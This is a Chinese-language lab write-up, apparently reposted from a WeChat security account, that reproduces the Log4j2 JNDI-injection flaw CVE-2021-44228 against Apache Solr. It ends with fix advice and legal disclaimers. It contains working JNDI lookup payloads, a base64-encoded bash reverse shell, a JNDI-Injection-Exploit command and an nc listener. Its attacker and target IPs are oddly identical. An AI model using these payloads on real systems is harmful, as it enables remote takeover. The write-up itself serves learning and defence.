CVE-2021-44228 —Log4j2远程代码执行漏洞

admin
admin
admin
138883
文章
114
评论
2023年4月27日20:34:25评论74 views字数 1982阅读6分36秒阅读模式

简述:

CVE-2021-44228是Log4j2库中的一个远程代码执行漏洞,可以使攻击者通过构造特殊的日志信息来远程执行恶意代码,从而造成系统被攻击者控制的风险。此漏洞影响多个应用程序和设备,已经被评为严重漏洞,并已发布了相关的安全补丁。建议用户尽快升级受影响的版本并采取其他安全措施以保护系统。

原理:

Apache Log4j2是一个基于Java的日志记录工具。该工具重写了Log4j框架,并且引入了大量丰富的特性。我们可以控制日志信息输送的目的地为控制台、文件、GUI组件等,通过定义每一条日志信息的级别,能够更加细致地控制日志的生成过程。该日志框架被大量用于业务系统开发,用来记录日志信息。

原文链接:

https://blog.csdn.net/weixin_49422491/article/details/126841176
影响版本

Apache Log4j 2.x <= 2.14.1

漏洞复现


1.漏洞验证

靶机开启后,访问端口8983(即可查看到Apache solr的管理页面)

CVE-2021-44228 —Log4j2远程代码执行漏洞

接着访问

http://192.168.182.128:8983/solr/admin/cores?action=1

我们可以设想通过可控的 Collections 来进行 JNDI注入,路径为

http://192.168.182.128:8983/solr/admin/cores?action=payload

先用dnslog获取一个临时域名

DNSLog Platform

http://www.dnslog.cn/

CVE-2021-44228 —Log4j2远程代码执行漏洞

构造payload

${jndi:ldap://获取的域名}

构造完成后

http://192.168.182.128:8983/solr/admin/cores?action=${jndi:ldap://h45vgh.dnslog.cn}


访问

CVE-2021-44228 —Log4j2远程代码执行漏洞

有访问记录,则验证有log4j2这个漏洞,接着

2.漏洞利用

准备JNDI注入工具

CVE-2021-44228 —Log4j2远程代码执行漏洞

Kali攻击机构造bash反弹命令

bash -i > /dev/tcp/192.168.182.128/9999 0>&1

bash64加密后

YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE4Mi4xMjgvOTk5OSAwPiYx
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C bash -c " {echo,base64加密后的bash语句}|{base64,-d}|{bash,-i}" -A 攻击机IP

构造完成后的语句

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C bash -c " {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE4Mi4xMjgvOTk5OSAwPiYx}|{base64,-d}|{bash,-i}" -A 192.168.182.128

用JNDI注入工具执行

CVE-2021-44228 —Log4j2远程代码执行漏洞

得到rmi和ldap

构造最终payload

http://192.168.182.128:8983/solr/admin/cores?action=${jndi:rmi://192.168.182.128:1099/gjidbo}

kali做好监听端口,准备接受反弹shell

nc -lvvp 9999

接着直接访问payload语句

CVE-2021-44228 —Log4j2远程代码执行漏洞

CVE-2021-44228 —Log4j2远程代码执行漏洞

成功上线靶机

修复建议:


  1. 升级最新版本

  2. 设置jvm参数"-Dlog4j2.formatMsgNoLookups=true";

  3. 设置系统环境变量"FORMAT_MESSAGES_PATTERN_DIS-ABLE_LOOKU_PS"为"true"

  4. 关闭应用的网络外连。


CVE-2021-44228 —Log4j2远程代码执行漏洞

本文版权归作者和微信公众号平台共有,重在学习交流,不以任何盈利为目的,欢迎转载。


由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。公众号内容中部分攻防技巧等只允许在目标授权的情况下进行使用,大部分文章来自各大安全社区,个人博客,如有侵权请立即联系公众号进行删除。若不同意以上警告信息请立即退出浏览!!!


敲敲小黑板:《刑法》第二百八十五条 【非法侵入计算机信息系统罪;非法获取计算机信息系统数据、非法控制计算机信息系统罪】违反国家规定,侵入国家事务、国防建设、尖端科学技术领域的计算机信息系统的,处三年以下有期徒刑或者拘役。违反国家规定,侵入前款规定以外的计算机信息系统或者采用其他技术手段,获取该计算机信息系统中存储、处理或者传输的数据,或者对该计算机信息系统实施非法控制,情节严重的,处三年以下有期徒刑或者拘役,并处或者单处罚金;情节特别严重的,处三年以上七年以下有期徒刑,并处罚金。



原文始发于微信公众号(无问之路):CVE-2021-44228 —Log4j2远程代码执行漏洞

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年4月27日20:34:25
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2021-44228 —Log4j2远程代码执行漏洞https://cn-sec.com/archives/1696675.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息